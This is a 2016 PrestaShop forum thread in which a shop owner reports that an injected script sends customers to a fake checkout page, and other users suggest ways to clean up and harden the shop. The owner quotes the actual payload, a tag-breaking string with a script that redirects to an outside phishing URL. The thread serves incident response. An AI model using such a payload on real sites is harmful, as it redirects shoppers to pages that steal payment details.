Site hacked, fix vulnerability to prevent

[johnmoore84]

My site has now been hacked 2 times within a week, what they are doing is injecting the script into one of the database table.

 

Unknown"><script>document.location="http://www.connexcargo.com/securePayment"</script>

 

This redirects the customer to a fake checkout page when they click the checkout button.

 

The first time they did this I updated all the modules that said there were updates available and changed the ftp details and login passwords.

 

I need a prestashop professional to find out where the vulnerability is and fix it, Ii understand it could be a module or even the theme.

 

The theme I have installed is

NaturaShop version 3.5.3

 

My prestashop version is 1.6.0.9

 

If someone with experence in this could help, please get in touch as soon as possible.

 

Regards John

[ExpressTech]

Hey, first of all upgrade to latest version of PS. 1.6.0.9 has a security vulnerabilities. If they are able to inject script inside the database that means they are attempting SQL injection attack.

 

I can check your server for all possible intrusion attempts. Let me know if you need my help. 

[selectshop.at]

I suppose you read this too ? https://www.prestashop.com/forums/topic/544579-major-security-issues-with-few-modules-and-themes/

 

If shop version and module versions are all actual, than you should revert to the developer of your theme. Perhaps this one is having lacks open for hackers.

[Simonas Invertus]

To upgrade shop should not hurt you, but the problem can be in the modules or theme.

 

Do you use shared hosting or not? In shared hosting the bugs can be in other websites. 

 

Just to double check: did you change database (mysql) access passwords?

 

Our company can do security investigation, but to check everything can take a long time (depending on the amount of installed modules). 

[El Patron]

My site has now been hacked 2 times within a week, what they are doing is injecting the script into one of the database table.

 

Unknown"><script>document.location="http://www.connexcargo.com/securePayment"</script>

 

This redirects the customer to a fake checkout page when they click the checkout button.

 

The first time they did this I updated all the modules that said there were updates available and changed the ftp details and login passwords.

 

I need a prestashop professional to find out where the vulnerability is and fix it, Ii understand it could be a module or even the theme.

 

The theme I have installed is

NaturaShop version 3.5.3

 

My prestashop version is 1.6.0.9

 

If someone with experence in this could help, please get in touch as soon as possible.

 

Regards John

the only post I saw so far was that the db table in question was connections, there are three connections.

 

if you look at your db via phpmyadmin, there are 3 connections tables, all which can be emptied without an issue. (of course export them first).

 

but at end of day finding can be difficult or very easy,  depending on your antivirus sfw.

 

1. change all ftp passwords

2. ensure folder permissions are 755 files 644

3. have up to date antivirus on your local computer

4. using ftp download your entire site and see if anythinig detected by your local anitivirus

5. if you download without ftp, then run your anitivrus against that folder

6. hopefully now the corrupted files have been  identified.

tip: using ftp, you can view  files on remote and notice if file timestamp has is more recent than other files

 

what we hope to accomplish is to replace bad files with good files, you can get your current release of ps files at top of this screen by clicking 'download'

 

then when you get it all sorted with good  files.

 

Look at this module, which will alert you when file(s) change and give you opportunity to replace file with repository, or commit the changed file to repository, amongst other things.

https://www.prestashop.com/forums/topic/303132-module-prestavault-malware-trojan-virus-hack-protection/

 

Happy day, el

 

p.s. for fast affordable hack clean up you  may want to consider community member DH42's service. 

https://dh42.com/support/cart.php?a=view

 

he has fixed a lot of shops.....and is 'super savvy'.

 

good luck.

Edited September 13, 2016 by El Patron (see edit history)

[selectshop.at]

I didn't realise that desktop anti-virus would detect website hacks?

Of course they do -> Anti Malwarebytes.

[El Patron]

I didn't realise that desktop anti-virus would detect website hacks?

 

I know right!  You local up to date antivirus sees them like any other file, even during FTP download it should detect hack.  The key is to review your security, folder/file permission and most importantly group owner, which  should be your domain name.  Once you have clean secure system then you need to know when something changes because hosting in 99% of small business will not detect/prevent.

 

 

A little story,  I was living in small town in Spain in I think late 2009 early 2010, minding my own business and my 1.4.6.2 got hacked.  Really twisted my underwear.  I learned a lot of  lessons and one was writing PrestaVault.  I looked at other options and felt for pure performance/control a standalone module solution was needed for my shop.  Now I sleep better.  

 

Also PrestaVault serves as the proverbial canary in the coal mine....up until about six months ago sales were maybe once a month.  Then PS started being hacked via poorly written module/theme vulnerabilities, not because of native out of box.  I sell more of this module in one month now than in entire  first two years since I released.  So there is a lot more attention being paid to ecommerce in general and now we see PrestaShop also as target for hackers.

 

Happy day, el